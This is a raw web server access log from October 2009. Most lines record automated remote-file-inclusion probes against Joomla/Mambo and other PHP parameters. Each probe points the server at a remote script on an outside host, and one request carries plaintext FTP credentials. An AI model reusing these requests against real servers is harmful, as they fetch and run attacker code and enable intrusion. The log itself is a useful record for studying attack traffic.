222.73.17.7 - - [13/Oct/2009:02:18:37 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:37 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.108.7.161 - - [13/Oct/2009:02:18:37 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
222.73.17.7 - - [13/Oct/2009:02:18:38 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:38 -0400] "GET /logs/access_log.Q109090700%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:38 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:38 -0400] "GET /logs/access_log.Q109071700%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:44 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:44 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:45 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:50 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:50 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:50 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:59 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:59 -0400] "GET /logs/access_log.Q109081900%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:18:59 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:02 -0400] "GET /logs/access_log.Q109081900%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:02 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:02 -0400] "GET /logs/access_log.Q109052200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:02 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:03 -0400] "GET /logs/access_log.Q109052200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:09 -0400] "GET /logs/access_log.Q109052200%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:09 -0400] "GET /logs/access_log.Q109082000%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:13 -0400] "GET /logs/access_log.Q109082000%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:19:15 -0400] "GET /logs/access_log.Q109052200%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.78.234 - - [13/Oct/2009:02:19:30 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.234 - - [13/Oct/2009:02:19:31 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.132 - - [13/Oct/2009:02:20:26 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
222.73.17.7 - - [13/Oct/2009:02:20:50 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:50 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:50 -0400] "GET /logs/access_log.Q109071700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:50 -0400] "GET /logs/access_log.Q109090700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:51 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:51 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:51 -0400] "GET /logs/access_log.Q109071700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:20:51 -0400] "GET /logs/access_log.Q109090700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:14 -0400] "GET //?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:14 -0400] "GET /logs/error_log.Q109062400%20%20//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:14 -0400] "GET /logs/access_log.Q109062400%20%20//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:14 -0400] "GET /logs//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:15 -0400] "GET /logs/access_log.Q109062400%20%20//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:15 -0400] "GET //?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:15 -0400] "GET /logs/error_log.Q109062400%20%20//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:21:15 -0400] "GET /logs//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:24 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:24 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:24 -0400] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:25 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:25 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:25 -0400] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:32 -0400] "GET /logs/access_log.Q109052200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:21:38 -0400] "GET /logs/access_log.Q109052200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:05 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:05 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:05 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:05 -0400] "GET /logs/access_log.Q109081900//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:06 -0400] "GET /logs/access_log.Q109081900//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:06 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:02:22:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [13/Oct/2009:02:22:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
174.143.3.188 - - [13/Oct/2009:02:22:43 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.143.3.188 - - [13/Oct/2009:02:22:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [13/Oct/2009:02:22:43 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.73.17.7 - - [13/Oct/2009:02:22:50 -0400] "GET /logs/access_log.Q109082000//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:22:52 -0400] "GET /logs/access_log.Q109082000//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:06 -0400] "GET //?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:06 -0400] "GET /logs/access_log.Q109061200//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:06 -0400] "GET /logs//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:06 -0400] "GET //?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:07 -0400] "GET /logs/access_log.Q109061200//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:06 -0400] "GET /logs//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:17 -0400] "GET /logs/access_log.Q109090600//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:02:24:19 -0400] "GET /logs/access_log.Q109090600//?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:25:14 -0400] "GET //main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:25:15 -0400] "GET /logs//main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:25:15 -0400] "GET /logs/error_log.Q109092800%20%20//main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:26:03 -0400] "GET /logs/error_log.Q109100400%20%20//main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.218.116.164 - - [13/Oct/2009:02:26:23 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.143.47.76 - - [13/Oct/2009:02:26:28 -0400] "GET //main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:26:29 -0400] "GET /logs//main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:26:30 -0400] "GET /logs/error_log.Q109092800//main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:27:04 -0400] "GET /logs/access_log.Q109051400/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:12 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:12 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:12 -0400] "GET /logs/access_log.Q109071700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:12 -0400] "GET /logs/access_log.Q109090700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:27:13 -0400] "GET /logs/access_log.Q109092600/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:13 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:13 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:13 -0400] "GET /logs/access_log.Q109090700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:13 -0400] "GET /logs/access_log.Q109071700//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:15 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:15 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:15 -0400] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:18 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:18 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:18 -0400] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.143.47.76 - - [13/Oct/2009:02:27:18 -0400] "GET /logs/error_log.Q109100400//main2.php?id=http://antoncev.ru/imgupload/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:19 -0400] "GET /logs/access_log.Q109052200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [13/Oct/2009:02:27:23 -0400] "GET /logs/access_log.Q109052200//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.39.130.27 - - [13/Oct/2009:02:27:24 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/comment_modify.php?dir=http://aniway.net/.../id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
